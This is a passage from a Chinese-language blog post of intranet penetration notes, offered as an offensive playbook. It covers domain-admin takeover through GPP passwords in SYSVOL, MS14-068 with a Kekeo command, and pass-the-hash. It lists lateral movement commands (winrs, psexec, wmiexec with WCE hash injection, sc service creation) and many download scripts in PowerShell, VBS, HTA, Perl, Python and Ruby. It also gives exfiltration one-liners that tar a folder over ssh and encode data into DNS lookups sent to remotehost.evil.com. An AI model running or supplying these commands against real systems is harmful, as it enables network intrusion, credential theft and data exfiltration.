<pre><code class="hljs undefined">cat /etc/issue      #查看系统名称cat /etc/lsb-release   #查看系统名称``cat /etc/nsswitch    #查看密码登陆策略``route  #查看路由``cat /etc/network/interfaces  #查看网卡配置文件``cat /``var``/log/syslog  #查看系统日志ps aux  #查看进程crontab -l  #计划任务cat /etc/network/interfaces #查看网络配置netstat #查看网络通信showmount -e ip 查看NFS连接ldapsearch -h 192.168.0.1 -x -z 10 -p 指定端口 #查找10条用户记录ldapsearch -x -D ``&quot;cn=administrator,cn=People,dc=unix-center,dc=net&quot;` `-b ``&quot;cn=administrator,cn=People,dc=unix-center,dc=net&quot;` `-h 192.168.0.1 #匿名信息查找管理员信息ldapsearch -x -W -D ``&quot;cn=administrator,cn=People,dc=unix-center,dc=net&quot;` `-b ``&quot;cn=administrator,cn=People,dc=unix-center,dc=net&quot;` `-h 192.168.2.2  #有密码形式查找管理员信息</code></pre>

<p>(2) 域管权限获取</p>
<p>除了工作组的几种方法外，还有域特别的几种渗透方法。</p>
<p>1.组策略漏洞（GPP）</p>
<p>域管理员使用GPP来配置和操作域，常见的操作有远程创建本地用户、映射打印机、映射磁盘等，这些操作有时候需要提供账号密码。当组策略进行分发时，会在 SYSVOL 目录下生成一个xml文件，理所当然的前面提供的账号密码都保存在这个xml文件中，而密码是经过AES加密得，也就是说完全可逆的加密算法，而微软同时也很照顾的公布了加密密钥，所以任何域普通用户就可以读取这些xml文件并使用公开的AES密钥破解密码。组策略漏洞是windows 2008的，而且不一定是groups.xml，其他的xml也可能存在密码。</p>
<pre><code class="hljs undefined">dir \\domain.com\sysvol\*</code></pre>

<p>2.Kerberos协议漏洞</p>
<p>关于Kerberos协议漏洞常见的三种有：MS14-068，Golden ticket（黄金票据），SILVER TICKET（白银票据）</p>
<p>简单介绍一下Kerberos协议的工作方法：</p>
<ul>
<li>客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥)，发送给kdc（域控），kdc对用户进行检测，成功之后创建TGT(Ticket-Granting Ticket)</li>
<li>将TGT进行加密签名返回给客户机器，只有域用户krbtgt才能读取kerberos中tgt数据</li>
<li>然后客户机将tgt发送给域控制器KDC请求TGS（票证授权服务）票证，并且对tgt进行检测</li>
<li>检测成功之后，将目标服务账户的ntlm以及tgt进行加密，将加密后的结果返回给客户机。</li>
</ul>
<p>ms14-068</p>
<p>Benjamin Delpy(mimikatz的作者)写了一个MS14-068的利用工具，叫Kekeo，是PyKEk的升级版，他能够找到并定位有漏洞的域控，在打了补丁（KB3011780）和 2012/2012r2域控情况下仍能奏效。</p>
<p>在利用ms14-068漏洞之前，建议先使用 klist/purge 清除服务器端缓存的 Kerberos 凭据，且使用域控地址不使用IP.</p>
<ul>
<li>PyKEK</li>
</ul>
<p>具体Pykek工具及下载地址：<a href="https://www.secpulse.com/archives/2874.html" target="_blank" rel="noopener">https://www.secpulse.com/archives/2874.html</a></p>
<p>github项目地址：<a href="https://github.com/mubix/pykek" target="_blank" rel="noopener">https://github.com/mubix/pykek</a></p>
<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131222312270-1593921519.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131222312270-1593921519.png" srcset="/img/loading.gif" alt="img"></a></p>
<ul>
<li>Kekeo</li>
</ul>
<p>先给出工具下载地址：<a href="https://github.com/gentilkiwi/kekeo/releases" target="_blank" rel="noopener">https://github.com/gentilkiwi/kekeo/releases</a></p>
<pre><code class="hljs undefined">利用条件：
     域用户及口令
     域控地址
利用方法：
     kekeo.exe /domain:vuln.local /user:adminstrator /password:12580/ /ptt</code></pre>

<p>具体使用参考：<a href="http://www.cnblogs.com/backlion/p/6820744.html" target="_blank" rel="noopener">http://www.cnblogs.com/backlion/p/6820744.html</a></p>
<p>3.相同密码登陆（hash碰撞）</p>
<p>hash碰撞实际上就是利用hash传递来盲打。</p>
<p>如果内网主机的本地管理员账户密码相同且允许账户登陆域内其他机器。</p>
<p>在域环境中，利用pass the hash的渗透方式往往是这样：</p>
<pre><code class="hljs undefined">1.获得一台域主机权限；
2.Dump内存获取用户hash（或明文）；
3.通过pass the hash 或 pass the ticket尝试登陆其他主机；
4.继续收集hash或明文，并尝试远程登陆；
5.知道获得域管理员hash，登陆域控，最终成功控制整个域。</code></pre>

<p>域登陆缓存mscash<br>使用reg命令提取sam、system、securit，然后用creddump7或者mimakatz提取mscash。</p>
<p>4.利用漏洞配置不当获取更多主机权限</p>
<ul>
<li>常见应用漏洞：</li>
</ul>
<pre><code class="hljs undefined">struts2、zabbix、axis、ImageMagic、fastcgi、Shellshock、redis未授权访问、Hadoop、weblogic、jboss、WebSphere、Coldfusion</code></pre>

<ul>
<li>常见语言反序列化漏洞</li>
</ul>
<pre><code class="hljs undefined">php、Java、python、ruby、node.js</code></pre>

<ul>
<li>数据库漏洞及配置不当</li>
</ul>
<pre><code class="hljs undefined">mssql Get-SQLServerAccess、MySQL低版本hash登陆、MySQL低版本Authentication Bypass、域内mssql凭证获取密码、monggodb未授权访问、memcache配置不当</code></pre>

<ul>
<li>内网中很多web应用存在常见漏洞、使用有漏洞的中间件和框架、弱口令及配置不当（注入、任意文件读取、备份、源码泄漏（rsync、git、svn、DS_Store）、代码执行、xss、弱口令、上传漏洞、权限绕过…）</li>
<li>web应用、及数据库中寻找其他服务器密码信息（ftp、mail、smb、ldap存储、sql…）</li>
<li>系统备份文件（ghost）中读密码</li>
<li>在已有控制权限主机中，查看各浏览器书签、cookie、存储密码、键盘记录收集相关敏感信息、查询注册表中保存密码、读取各客户端连接密码、putty dll注入、putty密码截取、ssh连接密码，以获取更多主机权限</li>
</ul>
<pre><code class="hljs undefined">推荐工具：NetRipper、Puttyrider.exe、ProwserPasswordDump.exe、LaZagne.exe</code></pre>

<ul>
<li>ms08-067 远程溢出（极少能碰到）</li>
<li>cmdkey /list 远程终端可信任连接连接 netpass.exe 读取该密码</li>
<li>arp欺骗中间人攻击（替换sql数据包、认证凭证获取、密码获取极大不到万不得已不会用）</li>
<li>WPAD中间人攻击（全称网络代理自动发现协议、截获凭证该种方法不需要ARP欺骗，比较好用的一种方法（使用Responder.py/net-creds.py））</li>
<li>翻阅相关文件及以控制数据库中可能存储配置口令（别忘了回收站）</li>
<li>用已有控制权限的邮箱账号以及前期所了解到的信息进行欺骗（社会工程学）</li>
<li>定向浏览器信息ip信息定向挂马（0day）</li>
<li>用以收集的密码（组合变换密码）对各服务进行爆破</li>
<li>应用0day攻击…</li>
</ul>
<p>5.远程命令执行方式</p>
<p>例如 at\schtasks\psexec\wmic\sc\ps 网上有很多相关资源也不占篇幅了，只提一个很少提的。从2012r2 起，他们开了一个端口叫5985，原理跟大家常说的 powershell remote是一样的，基于 winrm 服务，于是可以这样执行。又是一个系统自带的远程管理工具。</p>
<pre><code class="hljs undefined">winrs -r:192.168.22.33 -u:administrator -p:p@assw0rd ipconfig</code></pre>

<p>(3) 目标定位</p>
<p>在有域控权限的条件下，需要找到某台机器（服务器、个人机、数据库）</p>
<p>我们首先先将所有的域用户的详细信息都列举出来，通过详细名称（Full Name）确认其域用户。</p>
<p><a href="http://rcoil.me/2018/08/【域渗透】-批量Net-User/" target="_blank" rel="noopener">【域渗透】批量Net-User</a>。</p>
<pre><code class="hljs undefined">dsquery user - 查找目录中的用户。
dsquery computer - 查找目录中的计算机。</code></pre>

<p>我们将上面的两条命令的执行结果结合起来进行归类。</p>
<p>然后通过域控日志查找登陆IP或者机器。当然，除了日志还有别的方式，不限于日志。</p>
<p><a href="http://rcoil.me/2018/11/【域渗透】获取域环境内用户登录信息/" target="_blank" rel="noopener">【域渗透】获取域环境内用户登录信息</a></p>
<p>找到机器或者IP之后，可通过域管理员或者用其域用户进行登陆。登陆的方式也是有多重，上面有讲过。</p>
<p>但是，也有些机器是登陆不上的。我们可以通过设置域登陆脚本进行操作。</p>
<p><a href="http://rcoil.me/2018/11/【域渗透】在域控上使用cmd更改域用户配置文件中的登录脚本/" target="_blank" rel="noopener">【域渗透】在域控上使用cmd更改域用户配置文件中的登录脚本</a></p>
<p>5.权限维持</p>
<p>推荐三好学生大佬的文章：</p>
<p><a href="https://wooyun.x10sec.org/static/drops/tips-12518.html" target="_blank" rel="noopener">域渗透——Security Support Provider</a></p>
<p><a href="https://wooyun.x10sec.org/static/drops/tips-12670.html" target="_blank" rel="noopener">域渗透——Skeleton Key</a></p>
<p><a href="https://wooyun.x10sec.org/static/drops/tips-13079.html" target="_blank" rel="noopener">域渗透——Hook PasswordChangeNotify</a></p>
<p>——————-2019.2.8补充—————————</p>
<p>1.域内文件操作</p>
<p>2.域内运行命令</p>
<p>-————————–</p>
<p>1.域内文件操作：</p>
<p>Windows:</p>
<p>(1)利用IPC$传输文件</p>
<pre><code class="hljs undefined">建立ipc连接以后，就可以访问目标机器的文件（上传、下载），也可以在目标机器上运行命令。
上传和下载文件直接通过copy命令就可以，不过路径换成UNC路径。
何为UNC路径？简单来讲以\开头的路径就是UNC路径，比如\192.168.1.2\c$\boot.ini。
如果要从本地当前目录上传1.bat到192.168.1.2机器C盘根目录下，那么命令就是：

copy 1.bat \\192.168.1.2\C$\

反之就是下载。dir,copy,xcopy,move,type的参数都可以使用UNC路径</code></pre>

<p>(2)利用Telnet连接来传输文件</p>
<pre><code class="hljs undefined">服务端：nc -lvnp 23 &lt; nc.exe
下载端：telnet ip -f c:\nc.exe</code></pre>

<p>(3)利用文件共享</p>
<pre><code class="hljs undefined">net use x: \\[目标IP]\[地址] [域用户password] /user:[域]\[username]</code></pre>

<p>(4)powershell文件下载</p>
<p>powershell突破限制执行：</p>
<pre><code class="hljs undefined">powershell -ExecutionPolicy Bypass -File .\1.ps1</code></pre>

<p>1.ps1内容：</p>
<pre><code class="hljs undefined">$d = New-Object System.Net.WebClient
$d.DownloadFile(&quot;http://baidu.com/file.zip&quot;,&quot;c:/1.zip&quot;)</code></pre>

<p>(5)vbs脚本下载：</p>
<pre><code class="hljs undefined">Set xPost=createObject(&quot;Microsoft.XMLHTTP&quot;)
xPost.Open &quot;GET&quot;,&quot;http://192.168.206.101/file.zip&quot;,0
xPost.Send()
set sGet=createObject(&quot;ADODB.Stream&quot;)
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile &quot;c:\file.zip&quot;,2</code></pre>

<p>下载执行：</p>
<pre><code class="hljs undefined">cscript test.vbs</code></pre>

<p>(6)bitsadmin win03测试没有，win08有：</p>
<pre><code class="hljs undefined">bitsadmin /transfer n http://baidu.com/file.zip c:\1.zip</code></pre>

<p>(7)hta 保存为.hta文件后运行：</p>
<pre><code class="hljs undefined">&lt;html&gt;
&lt;head&gt;
&lt;script&gt;
var Object = new ActiveXObject(&quot;MSXML2.XMLHTTP&quot;);
Object.open(&quot;GET&quot;,&quot;http://192.168.206.101/demo.php.zip&quot;,false);
Object.send();
if (Object.Status == 200)
&#123;
    var Stream = new ActiveXObject(&quot;ADODB.Stream&quot;);
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile(&quot;C:\\demo.zip&quot;, 2);
    Stream.Close();
&#125;
window.close();
&lt;/script&gt;
&lt;HTA:APPLICATION ID=&quot;test&quot;
WINDOWSTATE = &quot;minimize&quot;&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</code></pre>

<p>Linux:</p>
<p>(1)perl脚本文件下载 kali下测试成功，centos5.5下，由于没有LWP::Simple这个，导致下载失败</p>
<pre><code class="hljs undefined">#!/usr/bin/perl
use LWP::Simple
getstore(&quot;http://baidu.com/file.zip&quot;, &quot;/root/1.zip&quot;);</code></pre>

<p>(2)python脚本文件下载：</p>
<pre><code class="hljs undefined">#!/usr/bin/python
import urllib2
u = urllib2.urlopen(&apos;http://baidu.com/file.zip&apos;)
localFile = open(&apos;/root/1.zip&apos;, &apos;w&apos;)
localFile.write(u.read())
localFile.close()</code></pre>

<p>(3)ruby文件下载 centos5.5没有ruby环境：</p>
<pre><code class="hljs undefined">#!/usr/bin/ruby
require &apos;net/http&apos;
Net::HTTP.start(&quot;www.lemon.com&quot;) &#123; |http|
r = http.get(&quot;/file.zip&quot;)
open(&quot;/root/1.zip&quot;, &quot;wb&quot;) &#123; |file|
file.write(r.body)
&#125;
&#125;</code></pre>

<p>(4)wget文件下载：</p>
<pre><code class="hljs undefined">wget http://baidu.com/file.zip -P /root/1.zip

其中-P是保存到指定目录</code></pre>

<p>(5)一边tar一边ssh上传：</p>
<pre><code class="hljs undefined">tar zcf - /some/localfolder | ssh remotehost.evil.com &quot;cd /some/path/name;tar zxpf -&quot;</code></pre>

<p>(6)利用dns传输数据：</p>
<pre><code class="hljs undefined">tar zcf - localfolder | xxd -p -c 16 |  while read line; do host $line.domain.com remotehost.evil.com; done</code></pre>

<p>其他传输方式：</p>
<p>(1)php脚本文件下载：</p>
<pre><code class="hljs undefined">&lt;?php
        $data = @file(&quot;http://example.com/file&quot;);
        $lf = &quot;local_file&quot;;
        $fh = fopen($lf, &apos;w&apos;);
        fwrite($fh, $data[0]);
        fclose($fh);
?&gt;</code></pre>

<p>(2)ftp文件下载：</p>
<pre><code class="hljs undefined">&gt;**windows下**
&gt;ftp下载是需要交互，但是也可以这样去执行下载
open host
username
password
bin
lcd c:/
get file
bye
&gt;将这个内容保存为1.txt， ftp -s:&quot;c:\1.txt&quot;
&gt;在mssql命令执行里面(不知道为什么单行执行一个echo,总是显示两行),个人一般喜欢这样
echo open host &gt;&gt; c:\hh.txt &amp; echo username &gt;&gt; c:\hh.txt &amp; echo password &gt;&gt;c:\hh.txt &amp; echo bin &gt;&gt;c:\hh.txt &amp; echo lcd c:\&gt;&gt;c:\hh.txt &amp; echo get nc.exe  &gt;&gt;c:\hh.txt &amp; echo bye &gt;&gt;c:\hh.txt &amp; ftp -s:&quot;c:\hh.txt&quot; &amp; del c:\hh.txt

&gt;**linux下**
&gt;bash文件
ftp 127.0.0.1
username
password
get file
exit

&gt;或者使用busybox里面的tftp或者ftp
&gt;busybox ftpget -u test -P test 127.0.0.1 file.zip</code></pre>

<p>(3)nc文件传输：</p>
<pre><code class="hljs undefined">服务端:cat file | nc -l 1234
下载端:nc host_ip 1234 &gt; file</code></pre>

<p>(4)使用SMB传送文件</p>
<p>本地linux的smb的环境配置：</p>
<pre><code class="hljs undefined">&gt;vi /etc/samba/smb.conf
[test]
    comment = File Server Share
    path = /tmp/
    browseable = yes
    writable = yes
    guest ok = yes
    read only = no
    create mask = 0755
&gt;service samba start</code></pre>

<p>下载端：</p>
<pre><code class="hljs undefined">net use o: \\192.168.206.129\test
dir o:</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201902/1344396-20190208110305087-1718640.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201902/1344396-20190208110305087-1718640.png" srcset="/img/loading.gif" alt="img"></a>/</p>
<p>2.域内运行命令</p>
<p>(1)利用计划任务</p>
<pre><code class="hljs undefined">at \\192.168.0.100 15:00 c:\hack.bat</code></pre>

<p>(2)PSexec</p>
<pre><code class="hljs undefined">psexec针对远程建立连接的认证方式有两种，一种先建立ipc连接，然后直接用

psexec \\192.168.0.100 cmd命令开启一个半交互式的cmdshell，另一种是在psexec的参数中指定账号密码。

参数：
   -s 参数用来以system权限执行
   –accepteula 绕过第一次运行的弹窗
   -c &lt;[路径]文件名&gt;:拷贝文件到远程机器并运行（注意：运行结束后文件会自动删除）
   -d 不等待程序执行完就返回

使用：psexec \\192.168.1.2 c:\hack.bat</code></pre>

<p>(3)wmiexec</p>
<pre><code class="hljs undefined">T00ls大牛写的一款工具。早就传开了。
半交互模式：
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 username password

单个命令执行的模式：
cscript.exe wmiexec.vbs /cmd 192.168.1.1 username password &quot;command&quot;

如果有时候我们抓取到的是hash，破解不了时可以利用WCE的hash注入，然后再执行WMIEXEC（不提供账号密码）就可以了。

cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1  
wce -s [hash] 
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1</code></pre>

<p>(4)SC创建服务执行：</p>
<pre><code class="hljs undefined">1、系统权限(其中test为服务名)
sc \\DC1 create test binpath= c:\cmd.exe
sc \\DC1 start test
sc \\DC1 delete test

2.指定用户权限启动
sc \\DC1 create test binpath = &quot;c:\1.exe&quot; obj= &quot;centoso\administrator&quot; passwrod= test
sc \\DC1 start test</code></pre>
            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/内网/">内网</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/内网/">内网</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                      <a href="/2020/03/16/补天公益爬虫之土豪厂商/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">补天公益爬虫之土豪厂商</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/03/03/记一次80万字符过狗注入/">
                        <span class="hidden-mobile">记一次80万字符过狗注入</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/main.js" ></script>


  <script  src="/js/lazyload.js" ></script>



  
  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>





  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>






<!-- Plugins -->



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "内网笔记&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>


















</body>
</html>
